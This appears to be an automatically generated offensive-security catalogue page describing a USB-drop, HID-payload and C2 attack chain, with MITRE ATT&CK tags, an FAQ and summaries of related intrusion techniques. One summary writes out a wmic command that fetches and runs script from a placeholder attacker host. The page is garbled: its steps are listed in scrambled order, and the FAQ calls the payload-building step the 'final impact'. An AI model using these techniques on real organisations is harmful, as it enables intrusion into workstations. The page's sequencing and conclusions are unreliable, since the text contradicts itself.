USB drop in parking lot → HID payload → C2

§ Context

Assumed environment: target has employees in / out of the building, USB ports unrestricted on workstations (no Device Control / EDR USB block). Outbound HTTPS to commodity hosts allowed.

§ Steps

1. 01
   PowerShell stager runsExecution

   T1059— Command and Scripting Interpreter
2. 02
   Beacon to attacker C2Command and Control

   T1071— Application Layer Protocol
3. 03
   Curious employee plugs inExecution

   T1204— User Execution
4. 04
   Local persistence on workstationPersistence

   W-SCHEDTASK-HIJACK— Scheduled Task Hijack
5. 05
   Drop sticks in parking lot / lobbyInitial Access

   SE-PRETEXT— Pretexting
6. 06
   Build HID payload (Ducky Script)Initial Access

   SE-USB-DROP— USB Drop / HID Attack

§ References

• T1059Command and Scripting Interpreter
• T1071Application Layer Protocol
• T1204User Execution

§ Frequently asked

What is the "USB drop in parking lot → HID payload → C2" attack path?

Drop branded-looking USB sticks near the target site. An employee plugs one in; a Rubber-Ducky-class HID device types a PowerShell payload that connects out to attacker C2. It chains 6 steps drawn from real-world offensive-security techniques.

What starting position does this attack require?

The first step is PowerShell stager runs (T1059) — a execution primitive. Assumed environment: target has employees in / out of the building, USB ports unrestricted on workstations (no Device Control / EDR USB block).

What is the final impact of this kill-chain?

The final step lands on Build HID payload (Ducky Script) (SE-USB-DROP), which falls under Initial Access. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

§ Related dossiers

• Shared techniques3

  certutil + bitsadmin → AV-friendly stager chain

  Initial access dropped a tiny .bat. It uses certutil to decode a base64 blob and bitsadmin to fetch the real beacon, then schtasks for persistence. Every binary is signed Microsoft.

• Shared techniques2

  wmic + XSL → AppLocker / SRP bypass

  wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.

• Shared techniques2

  ISO container → LNK → stage from CDN → C2

  Email attaches an ISO. Windows mounts it as a drive, bypassing Mark-of-the-Web. LNK inside runs a hidden binary that pulls the real stager from a CDN — Defender often misses the chain.

• Shared techniques2

  OneNote .one attachment → embedded payload → C2

  OneNote .one file with a friendly 'Double-click to view' overlay hides an embedded HTA / VBS / EXE. Effective initial access vector after Microsoft blocked internet macros in 2022.

• Shared techniques2

  Compromised vendor mailbox → reply-chain phishing → client compromise

  Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.

• Shared techniques2

  Gatekeeper bypass → unsigned binary execution

  Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.